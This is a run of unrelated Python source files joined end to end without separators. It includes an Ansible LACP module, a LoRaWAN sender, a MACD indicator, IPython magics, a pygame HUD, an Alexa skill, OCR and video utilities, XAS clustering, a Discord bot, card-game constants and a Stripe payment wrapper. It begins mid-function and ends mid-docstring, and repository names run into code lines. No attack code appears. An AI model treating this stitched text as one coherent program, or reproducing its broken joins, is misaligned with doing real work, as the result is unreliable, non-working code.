{} return lacp_facts def execute_module(self): """ Execute the module :rtype: A dictionary :returns: The result from module execution """ result = {"changed": False} warnings = list() commands = list() if self.state in self.ACTION_STATES: existing_lacp_facts = self.get_lacp_facts() else: existing_lacp_facts = {} if self.state in self.ACTION_STATES or self.state == "rendered": commands.extend(self.set_config(existing_lacp_facts)) if commands and self.state in self.ACTION_STATES: if not self._module.check_mode: self._connection.edit_config(commands) result["changed"] = True if self.state in self.ACTION_STATES: result["commands"] = commands if self.state in self.ACTION_STATES or self.state == "gathered": changed_lacp_facts = self.get_lacp_facts() elif self.state == "rendered": result["rendered"] = commands elif self.state == "parsed": running_config = self._module.params["running_config"] if not running_config: self._module.fail_json( msg="value of running_config parameter must not be empty for state parsed" ) result["parsed"] = self.get_lacp_facts(data=running_config) if self.state in self.ACTION_STATES: result["before"] = existing_lacp_facts if result["changed"]: result["after"] = changed_lacp_facts elif self.state == "gathered": result["gathered"] = changed_lacp_facts result["warnings"] = warnings return result def set_config(self, 
existing_lacp_facts): """ Collect the configuration from the args passed to the module, collect the current configuration (as a dict from facts) :rtype: A list :returns: the commands necessary to migrate the current configuration to the desired configuration """ want = self._module.params.get("config") if not want: want = {} have = existing_lacp_facts resp = self.set_state(want, have) return to_list(resp) def set_state(self, want, have): """ Select the appropriate function based on the state provided :param want: the desired configuration as a dictionary :param have: the current configuration as a dictionary :rtype: A list :returns: the commands necessary to migrate the current configuration to the desired configuration """ if self.state in ("merged", "replaced", "rendered") and not want: self._module.fail_json( msg="value of config parameter must not be empty for state {0}".format( self.state ) ) if self.state == "deleted": commands = self._state_deleted(want, have) elif self.state in ("merged", "rendered"): commands = self._state_merged(want, have) elif self.state == "replaced": commands = self._state_replaced(want, have) return commands def _state_replaced(self, want, have): """ The command generator when state is replaced :rtype: A list :returns: the commands necessary to migrate the current configuration to the desired configuration """ commands = [] commands.extend(self._state_deleted(want, have)) commands.extend(self._state_merged(want, have)) return commands def _state_merged(self, want, have): """ The command generator when state is merged :rtype: A list :returns: the commands necessary to merge the provided into the current configuration """ commands = [] updates = dict_diff(have, want) if self.state == "rendered": updates = want if updates: for key, value in iteritems( flatten_dict(remove_empties(updates["system"])) ): commands.append( "lacp system {0} {1}".format( key.replace("address", "mac"), value ) ) return commands def _state_deleted(self, want, have): """ The command generator when state is deleted :rtype: A list :returns: the commands necessary to remove the current configuration of the provided objects """ commands = [] for x in [ k for k in have.get("system", {}) if k not in remove_empties(want.get("system", {})) ]: commands.append("no lacp system {0}".format(x)) return commands from SX127x.LoRa import * from SX127x.LoRaArgumentParser import LoRaArgumentParser from SX127x.board_config_ada import BOARD import LoRaPy.counter as counter import LoRaWAN from LoRaWAN.MHDR import MHDR import LoRaPy.reset_ada as reset_ada reset_ada.reset() BOARD.setup() parser = LoRaArgumentParser("LoRaWAN sender") class LoRaSender(LoRa): def __init__(self, devaddr=[], nwkey=[], appkey=[], verbose=False, callback=lambda *_, **__: None): super(LoRaSender, self).__init__(verbose) self.verbose = verbose self.devaddr = devaddr self.nwkey = nwkey self.appkey = appkey self.rx_callback = callback def on_rx_done(self): if self.verbose: print("RxDone") self.clear_irq_flags(RxDone=1) payload = self.read_payload(nocheck=True) # if self.verbose: # print("".join(format(x, '02x') for x in bytes(payload))) lorawan = LoRaWAN.new(self.nwkey, self.appkey) lorawan.read(payload) # call callback-function self.rx_callback(lorawan.get_payload()) # if self.verbose: # print("lorawan read payload internally") # print(lorawan.get_mhdr().get_mversion()) # print(lorawan.get_mhdr().get_mtype()) # print(lorawan.get_mic()) # print(lorawan.compute_mic()) # print(lorawan.valid_mic()) # raw_payload = "".join(list(map(chr, 
lorawan.get_payload()))) # print(raw_payload) # print("\n") self.set_mode(MODE.SLEEP) self.reset_ptr_rx() self.set_mode(MODE.STDBY) def on_tx_done(self): self.set_mode(MODE.STDBY) self.clear_irq_flags(TxDone=1) if self.verbose: print("TxDone") self.set_mode(MODE.STDBY) if self.verbose: print("TxDone. Receiving LoRaWAN message\n") # set to "RX" self.set_dio_mapping([0] * 6) self.set_invert_iq(1) self.reset_ptr_rx() self.set_mode(MODE.RXCONT) print('check rx-state:') print(self.rx_is_good()) def send_tx(self, message): lorawan = LoRaWAN.new(self.nwkey, self.appkey) lorawan.create(MHDR.UNCONF_DATA_UP, {'devaddr': self.devaddr, 'fcnt': counter.get_current(), 'data': list(map(ord, message))}) self.write_payload(lorawan.to_raw()) self.set_mode(MODE.TX) # -*- coding: utf-8 -*- # MooQuant # # Copyright 2017 bopo.wang<> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ .. moduleauthor:: bopo.wang <> """ from mooquant import dataseries from mooquant.technical import ma class MACD(dataseries.SequenceDataSeries): """Moving Average Convergence-Divergence indicator as described in http://stockcharts.com/school/doku.php?id=chart_school:technical_indicators:moving_average_convergence_divergence_macd. :param dataSeries: The DataSeries instance being filtered. :type dataSeries: :class:`mooquant.dataseries.DataSeries`. :param fastEMA: The number of values to use to calculate the fast EMA. :type fastEMA: int. :param slowEMA: The number of values to use to calculate the slow EMA. :type slowEMA: int. :param signalEMA: The number of values to use to calculate the signal EMA. :type signalEMA: int. :param maxLen: The maximum number of values to hold. Once a bounded length is full, when new items are added, a corresponding number of items are discarded from the opposite end. If None then dataseries.DEFAULT_MAX_LEN is used. :type maxLen: int. """ def __init__(self, dataSeries, fastEMA, slowEMA, signalEMA, maxLen=None): assert (fastEMA > 0) assert (slowEMA > 0) assert (fastEMA < slowEMA) assert (signalEMA > 0) super().__init__(maxLen) # We need to skip some values when calculating the fast EMA in order for both EMA # to calculate their first values at the same time. # I'M FORCING THIS BEHAVIOUR ONLY TO MAKE THIS FITLER MATCH TA-Lib MACD VALUES. 
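# NOTE (illustrative sketch): this class computes MACD incrementally from EMA
# event windows. For reference, the batch form of the same indicator is
# MACD = EMA_fast(price) - EMA_slow(price), signal = EMA_signal(MACD),
# histogram = MACD - signal. The helper below is only an illustration with the
# conventional 12/26/9 defaults; it is not the mooquant implementation and does
# not reproduce the TA-Lib alignment trick described in the comment above.
def _ema(values, period):
    """Exponential moving average, seeded with the first value."""
    alpha = 2.0 / (period + 1)
    out = [values[0]]
    for v in values[1:]:
        out.append(alpha * v + (1.0 - alpha) * out[-1])
    return out

def macd(prices, fast=12, slow=26, signal=9):
    """Return (macd_line, signal_line, histogram) for a non-empty price series."""
    fast_ema = _ema(prices, fast)
    slow_ema = _ema(prices, slow)
    macd_line = [f - s for f, s in zip(fast_ema, slow_ema)]
    signal_line = _ema(macd_line, signal)
    histogram = [m - s for m, s in zip(macd_line, signal_line)]
    return macd_line, signal_line, histogram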
self.__fastEMASkip = slowEMA - fastEMA self.__fastEMAWindow = ma.EMAEventWindow(fastEMA) self.__slowEMAWindow = ma.EMAEventWindow(slowEMA) self.__signalEMAWindow = ma.EMAEventWindow(signalEMA) self.__signal = dataseries.SequenceDataSeries(maxLen) self.__histogram = dataseries.SequenceDataSeries(maxLen) dataSeries.getNewValueEvent().subscribe(self.__onNewValue) def getSignal(self): """Returns a :class:`mooquant.dataseries.DataSeries` with the EMA over the MACD.""" return self.__signal def getHistogram(self): """Returns a :class:`mooquant.dataseries.DataSeries` with the histogram (the difference between the MACD and the Signal).""" return self.__histogram def __onNewValue(self, dataSeries, dateTime, value): diff = None macdValue = None signalValue = None histogramValue = None # We need to skip some values when calculating the fast EMA in order for both EMA # to calculate their first values at the same time. # I'M FORCING THIS BEHAVIOUR ONLY TO MAKE THIS FITLER MATCH TA-Lib MACD VALUES. self.__slowEMAWindow.onNewValue(dateTime, value) if self.__fastEMASkip > 0: self.__fastEMASkip -= 1 else: self.__fastEMAWindow.onNewValue(dateTime, value) if self.__fastEMAWindow.windowFull(): diff = self.__fastEMAWindow.getValue() - self.__slowEMAWindow.getValue() # Make the first MACD value available as soon as the first signal value is available. # I'M FORCING THIS BEHAVIOUR ONLY TO MAKE THIS FITLER MATCH TA-Lib MACD VALUES. self.__signalEMAWindow.onNewValue(dateTime, diff) if self.__signalEMAWindow.windowFull(): macdValue = diff signalValue = self.__signalEMAWindow.getValue() histogramValue = macdValue - signalValue self.appendWithDateTime(dateTime, macdValue) self.__signal.appendWithDateTime(dateTime, signalValue) self.__histogram.appendWithDateTime(dateTime, histogramValue) """ Legacy stuff Various stuff that are there for historical / familiarity reasons. This is automatically imported by default profile, though not other profiles (e.g. 'sh' profile). Stuff that is considered obsolete / redundant is gradually moved here. """ from IPython.core import ipapi ip = ipapi.get() import os,sys from IPython.utils.genutils import * # use rehashx def magic_rehash(self, parameter_s = ''): """Update the alias table with all entries in $PATH. This version does no checks on execute permissions or whether the contents of $PATH are truly files (instead of directories or something else). For such a safer (but slower) version, use %rehashx.""" # This function (and rehashx) manipulate the alias_table directly # rather than calling magic_alias, for speed reasons. A rehash on a # typical Linux box involves several thousand entries, so efficiency # here is a top concern. path = filter(os.path.isdir,os.environ.get('PATH','').split(os.pathsep)) alias_table = self.shell.alias_table for pdir in path: for ff in os.listdir(pdir): # each entry in the alias table must be (N,name), where # N is the number of positional arguments of the alias. 
alias_table[ff] = (0,ff) # Make sure the alias table doesn't contain keywords or builtins self.shell.alias_table_validate() # Call again init_auto_alias() so we get 'rm -i' and other modified # aliases since %rehash will probably clobber them self.shell.init_auto_alias() ip.define_magic("rehash", magic_rehash) # Exit def magic_Quit(self, parameter_s=''): """Exit IPython without confirmation (like %Exit).""" self.shell.ask_exit() ip.define_magic("Quit", magic_Quit) # make it autocallable fn if you really need it def magic_p(self, parameter_s=''): """Just a short alias for Python's 'print'.""" exec 'print ' + parameter_s in self.shell.user_ns ip.define_magic("p", magic_p) import pygame from game_objects.player import Player from utils import settings class HeadsUpDisplay: """User Interface Heads up Display Draws the Stats and Weapon/Magic to the game screen """ def __init__(self) -> None: # General Info: self.display_surface = pygame.display.get_surface() self.font = pygame.font.Font(settings.UI_FONT, settings.UI_FONT_SIZE) # Bar Setup self.health_bar_rect = pygame.Rect(10,10,settings.HEALTH_BAR_WIDTH,settings.BAR_HEIGHT) self.energy_bar_rect = pygame.Rect(10,34,settings.ENERGY_BAR_WIDTH,settings.BAR_HEIGHT) # Weapon Graphics self.weapon_graphics = [] self.magic_graphics = [] self.__build_graphics_from_data_dict(settings.weapon_data, self.weapon_graphics) self.__build_graphics_from_data_dict(settings.magic_data, self.magic_graphics) def __build_graphics_from_data_dict(self, data:dict, append_to_list:list): """* Selects item graphic path from item data dict. * Insanities a pygame.image from the path * stores image in append to list Args: data (dict): The item data dictionary from the settings file append_to_list (list): list to append graphics file path to """ for item in data.values(): path = item['graphic'] img = pygame.image.load(path).convert_alpha() append_to_list.append(img) def __show_bar(self, cur_amount, max_amount, bg_rect:pygame.Rect, color): """Draw a Rect Bar to display stats Args: cur_amount (int): current stat amount max_amount (int): max stat amount bg_rect (pygame.Rect): instantiated background rect color (str): color code """ # Draw background pygame.draw.rect(self.display_surface, settings.UI_BG_COLOR, bg_rect) # convert stat to pixels ratio = cur_amount / max_amount cur_width = bg_rect.width * ratio cur_rect = bg_rect.copy() cur_rect.width = cur_width # Draw bar pygame.draw.rect(self.display_surface, color, cur_rect) # Draw border pygame.draw.rect(self.display_surface, settings.UI_BORDER_COLOR, bg_rect, 3) def __show_exp(self, exp): """Draw experience points to game screen Args: exp (int): experience points """ exp = str(int(exp)) exp_desc = f"EXP: {exp}" # build display text_surf = self.font.render(exp_desc, False, settings.TEXT_COLOR) x = self.display_surface.get_size()[0] - 20 y = self.display_surface.get_size()[1] - 20 text_rect = text_surf.get_rect(bottomright=(x,y)) # display on game screen # background pygame.draw.rect(self.display_surface,settings.UI_BG_COLOR, text_rect.inflate(20,20)) # contents self.display_surface.blit(text_surf, text_rect) # border pygame.draw.rect(self.display_surface,settings.UI_BORDER_COLOR, text_rect.inflate(20,20),3) def __selection_box(self, left, top, has_switched:bool): """Draw game item selection box Args: left (int): left position top (int): top position has_switched (bool): if player is switching Returns: pygame.Rect: Rect of the selection box created """ bg_rect = pygame.Rect(left, top, settings.ITEM_BOX_SIZE, 
settings.ITEM_BOX_SIZE) pygame.draw.rect(self.display_surface, settings.UI_BG_COLOR, bg_rect) if has_switched: pygame.draw.rect(self.display_surface, settings.UI_BORDER_COLOR_ACTIVE, bg_rect, 3) else: pygame.draw.rect(self.display_surface, settings.UI_BORDER_COLOR, bg_rect, 3) return bg_rect def __item_overlay(self, left:int, top:int, item_index:int, item_graphics:list ,has_switched:bool): """Draw the current item to the game screen Args: left (int): left position top (int): top position item_index (int): Current selected item index item_graphics (list): Item Graphic List has_switched (bool): Can Player Switch Itesm """ bg_rect = self.__selection_box(left,top, has_switched) surf = item_graphics[item_index] rect = surf.get_rect(center = bg_rect.center) self.display_surface.blit(surf, rect) def __show_level(self, level_nbr:int): desc = f'Level: {level_nbr}' # build display text_surf = self.font.render(desc, False, settings.TEXT_COLOR) x = self.display_surface.get_size()[0] * 0.5 y = self.display_surface.get_size()[1] *0.05 text_rect = text_surf.get_rect(center=(x,y)) # display on game screen # background pygame.draw.rect(self.display_surface,settings.UI_BG_COLOR, text_rect.inflate(20,20)) # contents self.display_surface.blit(text_surf, text_rect) # border pygame.draw.rect(self.display_surface,settings.UI_BORDER_COLOR, text_rect.inflate(20,20),3) def display(self, player:Player, level_nbr:int): """Draw UI Items to the Game Screen Args: player (Player): Insanitated Player Object """ self.__show_bar(player.health,player.stats['health'],self.health_bar_rect, settings.HEALTH_COLOR) self.__show_bar(player.energy,player.stats['energy'],self.energy_bar_rect, settings.ENERGY_COLOR) self.__show_exp(player.exp) self.__show_level(level_nbr) # Weapon Overlay self.__item_overlay(10,630, player.weapon_index,self.weapon_graphics,not player.can_switch_weapon) # Magic Overlay self.__item_overlay(90,630, player.magic_index,self.magic_graphics,not player.can_switch_magic) from robot.api.deco import not_keyword class HybridWithNotKeywordDecorator(object): def get_keyword_names(self): return ['exposed_in_hybrid', 'not_exposed_in_hybrid'] def exposed_in_hybrid(self): pass @not_keyword def not_exposed_in_hybrid(self): pass skill.py """Alexa Skill to harness the power of the Giant Bomb API.""" import sys import logging from flask import Flask, render_template from flask_ask import Ask, statement, question, session from gb import api app = Flask(__name__) ask = Ask(app, '/') logging.getLogger('flask_ask').setLevel(logging.DEBUG) giant_bomb = api.GBApi() @ask.launch def launch(): """Start the skill.""" greeting_text = render_template('greeting') reprompt_text = render_template('reprompt') return question(greeting_text).reprompt(reprompt_text) @ask.intent('GetAnswerIntent', mapping={'title': 'Title'}, default={'title': ''}) def answer(title): """The default intent to be triggered. Uses the title to search the GB API. 
:param title: the title to search in the wiki database :returns: a `flask-ask.statement` result with the given template text """ if not title: nothing_text = render_template('nothing') return question(nothing_text) lookup = giant_bomb.whatis(title) print("Lookup: {}".format(lookup)) if lookup.match: found_text = render_template('found', name=lookup.name, release=lookup.release_human, deck=lookup.deck) return statement(found_text) notfound_text = render_template('notfound', name=title) more_text = render_template('more') return statement(notfound_text) @ask.intent('AMAZON.HelpIntent') def help(): """Give the user the help text.""" help_text = render_template('reprompt') return question(help_text).reprompt(help_text) @ask.intent('AMAZON.StopIntent') def stop(): """Allow the user to stop interacting.""" return statement("Goodbye") @ask.intent('AMAZON.CancelIntent') def cancel(): """Allow the user to cancel the interaction.""" return statement("Goodbye") @ask.session_ended def session_ended(): """End the session gracefully.""" return "", 200 def main(): """Utility method to run the app if outside of lambda.""" app.run() if __name__ == '__main__': main()sheensantoscapadngan/instafill import cv2 import json import math def onMouse(event, x, y, flags, param): if event == cv2.EVENT_LBUTTONDOWN: print('('+str(x)+','+str(y)+')') def format_field_name(word_with_spaces): word_with_spaces = ''.join( e for e in word_with_spaces if (e.isalnum() or e.isspace())) word_with_spaces = ' '.join(word_with_spaces.split()) word_with_spaces = word_with_spaces.lower() word_with_spaces = word_with_spaces.strip() return word_with_spaces def format_word(word): word = ''.join( e for e in word if (e.isalnum() or e.isspace())) word = word.lower() word = word.strip() return word def extract_ext_details(ext): try: pipe_split = ext.split('|') comma_split = pipe_split[1].split(',') word_value = format_word(pipe_split[0]) return word_value, comma_split except: return None, None def is_connected(current_pos, candidate_pos): vertical_thresh = 5 horizontal_thresh = 15 if len(current_pos) < 8 or len(candidate_pos) < 8: return False # current pos bot_right = (float(current_pos[4]), float(current_pos[5])) # candidate pos bot_left = (float(candidate_pos[6]), float(candidate_pos[7])) horizontal_diff = abs(bot_left[0]-bot_right[0]) vertical_diff = abs(bot_left[1]-bot_right[1]) if horizontal_diff < horizontal_thresh and vertical_diff < vertical_thresh: return True else: return False def extract_words_and_positions(response): result = "" for text in response[1:]: field_name = text.description result += field_name + '|' for i, vertex in enumerate(text.bounding_poly.vertices): result += str(vertex.x) + ',' + str(vertex.y) if i != len(text.bounding_poly.vertices) - 1: result += ',' result += '\n' return result def get_final_pos(start_pos, end_pos): pos = {} pos['top_left'] = (int(start_pos[0]), int(start_pos[1])) pos['bot_left'] = (int(start_pos[6]), int(start_pos[7])) pos['top_right'] = (int(end_pos[2]), int(end_pos[3])) pos['bot_right'] = (int(end_pos[4]), int(end_pos[5])) return pos def display_field_boxes(fields, img): for field, positions in fields.items(): for label, position in positions.items(): img = cv2.circle(img, position, radius=1, color=(0, 0, 255), thickness=-1) cv2.imshow("res", img) cv2.waitKey(0) def extract_coords_from_img(response, page): fields = {} words_and_positions = extract_words_and_positions(response) used_fields = set() repeat_count = 0 ind = 0 ext_data_list = words_and_positions.split('\n') while ind < 
len(ext_data_list): current_word, current_pos = extract_ext_details(ext_data_list[ind]) start_pos = current_pos ind += 1 while ind < len(ext_data_list): candidate_line = ext_data_list[ind] candidate_word, candidate_pos = extract_ext_details(candidate_line) if candidate_word is None: break if is_connected(current_pos, candidate_pos): current_word += ' ' + candidate_word current_pos = candidate_pos ind += 1 else: break if current_word is None: continue if any(c for c in current_word if c.isalnum()): final_pos = get_final_pos(start_pos, current_pos) if current_word not in used_fields: fields[current_word] = final_pos used_fields.add(current_word) else: current_repeat_val = "*_" + str(repeat_count) repeat_count += 1 fields[current_repeat_val] = final_pos return fields # 功能:通过帧数截取视频中感兴趣片段、对感兴趣片段进行求平均得到背景图 import cv2 import numpy as np # 定义函数,对原始视频进行裁剪 # 输入: # capture: 已经读取的视频 # begin: 起始帧数 # end: 终止帧数 # 输出: # 在文件夹中存储截取后的视频,保存名称为videoCut.avi,帧数和分辨率保持原始视频规格 def videoCut(capture, begin, end): # 获取视频信息 fps = capture.get(cv2.CAP_PROP_FPS) size = (int(capture.get(cv2.CAP_PROP_FRAME_WIDTH)), int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT))) # 从原始视频中截取关键部分段 out = cv2.VideoWriter('videoCut.avi', cv2.VideoWriter_fourcc(*'XVID'), fps, size) i = 0 success, frame = capture.read() while success: success, frame = capture.read() if success: i += 1 if (i > begin and i < end): # 截取起始帧到终止帧之间的视频 out.write(frame) else: print('end') break # 定义函数,对截取视频进行求平均,得到背景 # 输入: # capture: 已经读取的视频 # 输出: # 在文件夹中存储求得平均后的背景图像,保存的名称为resultImage.jpg def meanBackground(capture): # 获取视频长度 frameNum = capture.get(cv2.CAP_PROP_FRAME_COUNT) success, frame = capture.read() # 初始化平均背景图像,初始化图像为视频首帧图像 meanFrame = frame # 在后续处理中为了防止数值溢出,先进行数据类型转化,转为float32型,在处理完成后在转化为unint8格式进行保存 meanFrame = meanFrame.astype(np.float32) cv2.imshow('original image', meanFrame) while True: # Capture frame-by-frame ret, frame = capture.read() if ret == True: tempframe = frame tempframe = tempframe.astype(np.float32) # 将所有帧的图像进行叠加 cv2.accumulate(tempframe, meanFrame) cv2.imshow('original video', frame) cv2.imshow('temp frame', tempframe) cv2.imshow('mean video', meanFrame) # Press Q on keyboard to exit if cv2.waitKey(33) & 0xFF == ord('q'): break # Break the loop else: break # cv2.imshow('accumulate image', meanFrame) # cv2.waitKey(0) meanFrame = meanFrame / frameNum # 对叠加后的图像进行求平均 meanFrame = meanFrame.astype(np.uint8) # 从float32转为uint8格式 cv2.imshow('result image', meanFrame) cv2.waitKey(300) cv2.imwrite('resultImage.jpg', meanFrame) # 读取原始视频文件 capture = cv2.VideoCapture('video1.mp4') if not capture.isOpened: print('Unable to open: ' + capture.input) exit(0) # 截取视频 videoCut(capture, 10, 500) # 读取截取后的视频 capture = cv2.VideoCapture('videoCut.avi') # 通过截取视频,使用平均值法求背景 meanBackground(capture) # 处理完毕,释放内存 capture.release() #!/usr/bin/python # -*- coding: utf-8 -*- """ The :mod:`~araucaria.stats.cluster` module offers the following functions to perform clustering: .. list-table:: :widths: auto :header-rows: 1 * - Function - Description * - :func:`cluster` - Performs hierarchical clustering on a collection. """ from typing import List, Tuple from numpy import inf from scipy.cluster.hierarchy import linkage from .. import Dataset, Collection from ..xas.xasutils import get_mapped_data def cluster(collection: Collection, taglist: List[str]=['all'], cluster_region: str='xanes', cluster_range: list=[-inf,inf], method: str='single', metric: str='euclidean', kweight: int=2) -> Dataset: """Performs hierarchical clustering on a collection. 
Parameters ---------- collection Collection with the groups for clustering. taglist List with keys to filter groups based on their ``tags`` attributes in the Collection. The default is ['all']. cluster_region XAFS region to perform clustering. Accepted values are 'dxanes', 'xanes', or 'exafs'. The default is 'xanes'. cluster_range Domain range in absolute values. Energy units are expected for 'dxanes' or 'xanes', while wavenumber (k) units are expected for 'exafs'. The default is [-:data:`~numpy.inf`, :data:`~numpy.inf`]. method Likage method to compute the distance between clusters. See the :func:`~scipy.cluster.hierarchy.linkage` function of ``scipy`` for a list of valid method names. The default is 'single'. metric The distance metric. See the :func:`~scipy.spatial.distance.pdist` function of ``scipy`` for a list of valid distance metrics. The default is 'euclidean'. kweight Exponent for weighting chi(k) by k^kweight. Only valid for ``cluster_region='exafs'``. The default is 2. Returns ------- : Dataset with the following arguments: - ``Z`` : hierarchical clustering encoded as a linkage matrix. - ``groupnames`` : list with names of clustered groups. - ``energy`` : array with energy values. Returned only if ``cluster_region='xanes`` or ``cluster_region=dxanes``. - ``k`` : array with wavenumber values. Returned only if ``cluster_region='exafs'``. - ``matrix`` : array with observed values for groups in ``cluster_range``. - ``cluster_pars`` : dictionary with cluster parameters. See also -------- :func:`~araucaria.plot.fig_cluster.fig_cluster` : Plots the dendrogram of a hierarchical clustering. Examples -------- >>> from araucaria.testdata import get_testpath >>> from araucaria import Dataset >>> from araucaria.xas import pre_edge, autobk >>> from araucaria.stats import cluster >>> from araucaria.io import read_collection_hdf5 >>> from araucaria.utils import check_objattrs >>> fpath = get_testpath('Fe_database.h5') >>> collection = read_collection_hdf5(fpath) >>> collection.apply(pre_edge) >>> out = cluster(collection, cluster_region='xanes') >>> attrs = ['groupnames', 'energy', 'matrix', 'Z', 'cluster_pars'] >>> check_objattrs(out, Dataset, attrs) [True, True, True, True, True] >>> # exafs clustering >>> collection.apply(autobk) >>> out = cluster(collection, cluster_region='exafs', cluster_range=[0,10]) >>> attrs = ['groupnames', 'k', 'matrix', 'Z', 'cluster_pars'] >>> check_objattrs(out, Dataset, attrs) [True, True, True, True, True] """ xvals, matrix = get_mapped_data(collection, taglist=taglist, region=cluster_region, range=cluster_range, kweight=kweight) # linkage matrix # matrix is transposed to follow the m by n convention with m observation vectors Z = linkage(matrix.T, method=method, metric=metric) # storing cluster parameters cluster_pars = {'cluster_region': cluster_region, 'cluster_range' : cluster_range, 'method' : method, 'metric' : metric,} # additional cluster parameters if cluster_region == 'exafs': xvar = 'k' # x-variable cluster_pars['kweight'] = kweight else: # xanes/dxanes clustering xvar = 'energy' # x-variable # storing cluster results content = {'groupnames' : collection.get_names(taglist=taglist), xvar : xvals, 'matrix' : matrix, 'Z' : Z, 'cluster_pars' : cluster_pars,} out = Dataset(**content) return out if __name__ == '__main__': import doctest doctest.testmod()0 """ entry point for `the void` """ import json import logging import asyncio import traceback from typing import TYPE_CHECKING, Optional, List, Dict, Union import asyncpg import discord from discord.ext 
import commands import db from bot import VBot logging.basicConfig(level=logging.INFO, format="[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s") log = logging.getLogger(__name__) bot = VBot(command_prefix=["v;", "V;"], description="A bot that consumes all messages.", owner_id=389590659335716867, case_insensitive=True) @bot.event async def on_ready(): log.info('Connected using discord.py version {}!'.format(discord.__version__)) log.info('Username: {0.name}, ID: {0.id}'.format(bot.user)) log.info("Connected to {} servers.".format(len(bot.guilds))) log.info('------') log.warning("thevoid is fully loaded.") # ---- Command Error Handling ----- # @bot.event async def on_command_error(ctx, error): # https://gist.github.com/EvieePy/7822af90858ef65012ea500bcecf1612 # This prevents any commands with local handlers being handled here in on_command_error. if hasattr(ctx.command, 'on_error'): return if type(error) == discord.ext.commands.NoPrivateMessage: await ctx.send("⚠ This command can not be used in DMs!!!") return elif type(error) == discord.ext.commands.CommandNotFound: await ctx.send("⚠ Invalid Command!!!") return elif type(error) == discord.ext.commands.MissingPermissions: await ctx.send("⚠ You need the **Manage Messages** permission to use this command".format(error.missing_perms)) return elif type(error) == discord.ext.commands.MissingRequiredArgument: await ctx.send("⚠ {}".format(error)) elif type(error) == discord.ext.commands.BadArgument: await ctx.send("⚠ {}".format(error)) elif isinstance(error, commands.CommandOnCooldown): await ctx.send("⚠ {}".format(error)) else: await ctx.send("⚠ {}".format(error)) raise error @bot.event async def on_error(event_name, *args): log.exception("Exception from event {}".format(event_name)) if 'error_log_channel' not in config: return error_log_channel = bot.get_channel(config['error_log_channel']) embed = None # Determine if we can get more info, otherwise post without embed # if args and type(args[0]) == discord.Message: # message: discord.Message = args[0] # embeds.exception_w_message(message) # elif args and type(args[0]) == discord.RawMessageUpdateEvent: # logging.error("After Content:{}.".format(args[0].data['content'])) # if args[0].cached_message is not None: # logging.error("Before Content:{}.".format(args[0].cached_message.content)) # Todo: Add more traceback_message = "```python\n{}```".format(traceback.format_exc()) traceback_message = (traceback_message[:1993] + ' ...```') if len(traceback_message) > 2000 else traceback_message await error_log_channel.send(content=traceback_message, embed=embed) if __name__ == '__main__': with open('config.json') as json_data_file: config = json.load(json_data_file) log.info(f"Connecting to DB @: {config['db_uri']}") db_pool: asyncpg.pool.Pool = asyncio.get_event_loop().run_until_complete(db.create_db_pool(config['db_uri'])) asyncio.get_event_loop().run_until_complete(db.create_tables(db_pool)) bot.config = config bot.db_pool = db_pool bot.load_cogs() bot.run(config['token']) log.info("cleaning Up and shutting down") loveletter/card.py # -*- coding: utf-8 -*- """ Love Letter Card tools Functions and constants to facilitate working with cards, which are represented as integers. 
""" import numpy as np class Card(): """Static Card class""" noCard = 0 guard = 1 priest = 2 baron = 3 handmaid = 4 prince = 5 king = 6 countess = 7 princess = 8 # 0 1 2 3 names = ['', 'Guard', 'Priest', 'Baron', # 4 5 6 7 8 'Handmaid', 'Prince', 'King', 'Countess', 'Princess'] # 0 1 2 3 4 5 6 7 8 symbols = ['☁️', '⚔️', '🕌', '🎲', '🛡️', '⚜️', '👑', '👸', '❤️'] descriptions = ['None', # None 'Guess a player\'s hand', # Guard 'Look at a hand', # Priest 'Compare hands; lower hand is out.', # Baron 'Protection until your next turn', # Handmaid 'One player discards their hand', # Prince 'Trade hands with target player', # King 'Discard if caught with King or Prince', # Countess 'Lose if discarded'] # Princess counts = [5, # Guard 2, # Priest 2, # Baron 2, # Handmaid 2, # Prince 1, # King 1, # Countess 1] # Princess only_self = [4, 7, 8] only_other = [1, 2, 3, 6] @staticmethod def render_card_number(card): """Render a card name with padded length""" numbered_names = ["{} {} ({})".format(name, symbol, idx) for idx, (name, symbol) in enumerate(zip(Card.names, Card.symbols))] max_length = max([len(i) for i in numbered_names]) str_base = "{0: >" + str(max_length) + "}" return str_base.format(numbered_names[card]) @staticmethod def shuffle_deck(seed=451): """A numpy array of shuffled cards""" deck = [] for card_number, card_count in enumerate(Card.counts): card_id = card_number + 1 deck = deck + [card_id] * card_count deck_np = np.array(deck) np.random.seed(seed=seed) np.random.shuffle(deck_np) return deck_np mutouxia/kamiFaka import stripe class Stripe(object): def __init__(self,payment='wechat'): from service.util.pay.pay_config import get_config if payment == 'wechat': self.types = 'wechat' config = get_config('Stripe微信') else: self.types = 'alipay' config = get_config('Stripe支付宝') self.key = config['key'] # sk_开头密钥 self.currency= config['currency'] # 美元或人名币 self.web_url = get_config('web_url') self.return_url = self.web_url+'/notify/stripe' def create_order(self,name,out_trade_no,total_price): try: res = stripe.Source.create( type=self.types, # 或alipay currency=self.currency, # 货币单位 redirect={ 'return_url': self.return_url }, amount=int(total_price*100), #最低4元起步 api_key=self.key ) data = res.to_dict_recursive() print(data) # 返回url值,数据库存储secret值 if self.types == 'wechat': # 不清楚是否可直接扫码 qr_code = data['wechat']['qr_code_url'] else: qr_code = data['redirect']['url'] return {'qr_code':qr_code,'redirect':1,'signs':data['id']+data['client_secret']} # 第三方状态1;本地2 except Exception as e: print(e) return None # def verify(self,data): #异步通知 # 没有异步校验,仅仅比对数据库里的三个参数即可 # try: # data['source'] # 根据此查询数据==》获取之前存储的client # if data['client_secret'] == 数据库client_secret: # return True # except Exception as e: # print(e) # return False WooQi57/cassie-runtools/aslip_tests/taskspace_tracking.py """ Measures the taskspace tracking error for aslip policies individually for each speed the policy accepts """ import os, sys, argparse sys.path.append("../..") from cassie import CassieEnv, CassiePlayground from rl.policies.actor import GaussianMLP_Actor import matplotlib.pyplot as plt from mpl_toolkits.mplot3d import Axes3D import pickle import numpy as np import torch import time def set_axes_equal(ax): '''Make axes of 3D plot have equal scale so that spheres appear as spheres, cubes as cubes, etc.. This is one possible solution to Matplotlib's ax.set_aspect('equal') and ax.axis('equal') 